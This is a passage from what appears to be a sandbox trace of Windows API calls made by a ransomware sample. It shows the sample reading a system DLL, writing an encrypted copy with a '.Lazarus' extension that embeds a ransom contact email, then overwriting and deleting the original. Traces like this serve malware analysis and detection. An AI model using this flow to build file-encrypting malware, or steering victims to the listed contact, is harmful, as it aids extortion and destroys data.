shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 94 [0090.173] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0090.173] GetFileType (hFile=0x418) returned 0x1 [0090.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.173] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0090.173] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0090.173] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0090.173] CloseHandle (hObject=0x418) returned 1 [0090.174] AreFileApisANSI () returned 1 [0090.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 94 [0090.174] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbc) returned 0x55f20 [0090.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=94 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 94 [0090.174] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0090.174] GetFileType (hFile=0x418) returned 0x1 [0090.174] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.174] CloseHandle (hObject=0x418) returned 1 [0090.174] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.174] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.174] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.174] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.174] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.174] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.174] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.174] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.174] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0090.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0090.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0090.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0090.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0090.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0090.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0090.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0090.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0090.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0090.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0090.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0090.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0090.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0090.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0090.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0090.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0090.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0090.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0090.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0090.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0090.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0090.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0090.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0090.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0090.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0090.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0090.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0090.176] AreFileApisANSI () returned 1 [0090.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 94 [0090.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbc) returned 0x55f20 [0090.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=94 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 94 [0090.176] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x68c0)) returned 1 [0090.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.176] AreFileApisANSI () returned 1 [0090.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0090.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0090.176] GetLastError () returned 0x0 [0090.176] SetLastError (dwErrCode=0x0) [0090.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df88 [0090.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x4f220 [0090.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b8b0 [0090.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0090.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0090.176] GetLastError () returned 0x0 [0090.176] SetLastError (dwErrCode=0x0) [0090.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0090.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0090.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa7) returned 0x5f008 [0090.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0090.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0090.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0090.177] AreFileApisANSI () returned 1 [0090.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5f008, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0090.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x138) returned 0x4e568 [0090.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5f008, cbMultiByte=-1, lpWideCharStr=0x4e568, cchWideChar=156 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 156 [0090.177] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0090.177] GetFileType (hFile=0x418) returned 0x1 [0090.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e568 | out: hHeap=0x20000) returned 1 [0090.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0090.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0090.178] AreFileApisANSI () returned 1 [0090.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 94 [0090.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbc) returned 0x55f20 [0090.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=94 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 94 [0090.178] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0090.178] GetFileType (hFile=0x368) returned 0x1 [0090.178] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0090.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0090.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0090.178] GetLastError () returned 0x0 [0090.178] SetLastError (dwErrCode=0x0) [0090.178] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0090.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0090.178] GetLastError () returned 0x0 [0090.178] SetLastError (dwErrCode=0x0) [0090.178] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0090.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0090.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x49ca0 [0090.179] ReadFile (in: hFile=0x368, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0090.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0090.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4f8 [0090.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4aca8 [0090.181] GetLastError () returned 0x0 [0090.181] SetLastError (dwErrCode=0x0) [0090.181] GetLastError () returned 0x0 [0090.181] SetLastError (dwErrCode=0x0) [0090.181] GetLastError () returned 0x0 [0090.181] SetLastError (dwErrCode=0x0) [0090.181] GetLastError () returned 0x0 [0090.181] SetLastError (dwErrCode=0x0) [0090.182] ReadFile (in: hFile=0x368, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.182] WriteFile (in: hFile=0x418, lpBuffer=0x4aca8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4aca8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.183] GetLastError () returned 0x0 [0090.183] SetLastError (dwErrCode=0x0) [0090.183] GetLastError () returned 0x0 [0090.183] SetLastError (dwErrCode=0x0) [0090.183] GetLastError () returned 0x0 [0090.183] SetLastError (dwErrCode=0x0) [0090.183] GetLastError () returned 0x0 [0090.183] SetLastError (dwErrCode=0x0) [0090.183] ReadFile (in: hFile=0x368, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.183] WriteFile (in: hFile=0x418, lpBuffer=0x4aca8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4aca8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.184] GetLastError () returned 0x0 [0090.184] SetLastError (dwErrCode=0x0) [0090.184] GetLastError () returned 0x0 [0090.184] SetLastError (dwErrCode=0x0) [0090.184] GetLastError () returned 0x0 [0090.184] SetLastError (dwErrCode=0x0) [0090.184] GetLastError () returned 0x0 [0090.184] SetLastError (dwErrCode=0x0) [0090.184] ReadFile (in: hFile=0x368, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.184] WriteFile (in: hFile=0x418, lpBuffer=0x4aca8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4aca8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.184] GetLastError () returned 0x0 [0090.185] SetLastError (dwErrCode=0x0) [0090.185] GetLastError () returned 0x0 [0090.185] SetLastError (dwErrCode=0x0) [0090.185] GetLastError () returned 0x0 [0090.185] SetLastError (dwErrCode=0x0) [0090.185] GetLastError () returned 0x0 [0090.185] SetLastError (dwErrCode=0x0) [0090.185] ReadFile (in: hFile=0x368, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.185] WriteFile (in: hFile=0x418, lpBuffer=0x4aca8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4aca8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.185] GetLastError () returned 0x0 [0090.185] SetLastError (dwErrCode=0x0) [0090.186] GetLastError () returned 0x0 [0090.186] SetLastError (dwErrCode=0x0) [0090.186] GetLastError () returned 0x0 [0090.186] SetLastError (dwErrCode=0x0) [0090.186] GetLastError () returned 0x0 [0090.186] SetLastError (dwErrCode=0x0) [0090.186] ReadFile (in: hFile=0x368, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.186] WriteFile (in: hFile=0x418, lpBuffer=0x4aca8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4aca8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.186] GetLastError () returned 0x0 [0090.186] SetLastError (dwErrCode=0x0) [0090.186] GetLastError () returned 0x0 [0090.186] SetLastError (dwErrCode=0x0) [0090.187] GetLastError () returned 0x0 [0090.187] SetLastError (dwErrCode=0x0) [0090.187] GetLastError () returned 0x0 [0090.187] SetLastError (dwErrCode=0x0) [0090.187] ReadFile (in: hFile=0x368, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x327f0c4*=0x8c0, lpOverlapped=0x0) returned 1 [0090.237] WriteFile (in: hFile=0x418, lpBuffer=0x4aca8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4aca8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.240] GetLastError () returned 0x0 [0090.240] SetLastError (dwErrCode=0x0) [0090.240] GetLastError () returned 0x0 [0090.240] SetLastError (dwErrCode=0x0) [0090.240] ReadFile (in: hFile=0x368, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0090.247] GetLastError () returned 0x0 [0090.247] SetLastError (dwErrCode=0x0) [0090.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4f8 | out: hHeap=0x20000) returned 1 [0090.248] WriteFile (in: hFile=0x418, lpBuffer=0x4aca8*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x4aca8*, lpNumberOfBytesWritten=0x327ef70*=0x8c0, lpOverlapped=0x0) returned 1 [0090.248] GetLastError () returned 0x0 [0090.248] SetLastError (dwErrCode=0x0) [0090.253] GetLastError () returned 0x0 [0090.253] SetLastError (dwErrCode=0x0) [0090.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0090.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0090.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0090.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0090.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4aca8 | out: hHeap=0x20000) returned 1 [0090.254] CloseHandle (hObject=0x418) returned 1 [0090.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0090.261] CloseHandle (hObject=0x368) returned 1 [0090.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0090.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0090.263] AreFileApisANSI () returned 1 [0090.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 94 [0090.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbc) returned 0x55f20 [0090.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=94 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 94 [0090.264] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0090.286] GetFileType (hFile=0x368) returned 0x1 [0090.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0090.290] GetLastError () returned 0xb7 [0090.291] SetLastError (dwErrCode=0xb7) [0090.291] WriteFile (in: hFile=0x368, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0090.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0090.295] CloseHandle (hObject=0x368) returned 1 [0090.295] AreFileApisANSI () returned 1 [0090.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 94 [0090.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbc) returned 0x55f20 [0090.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=94 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 94 [0090.295] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll")) returned 1 [0090.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0090.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0090.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0090.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0090.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0090.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0090.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0090.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0090.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0090.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 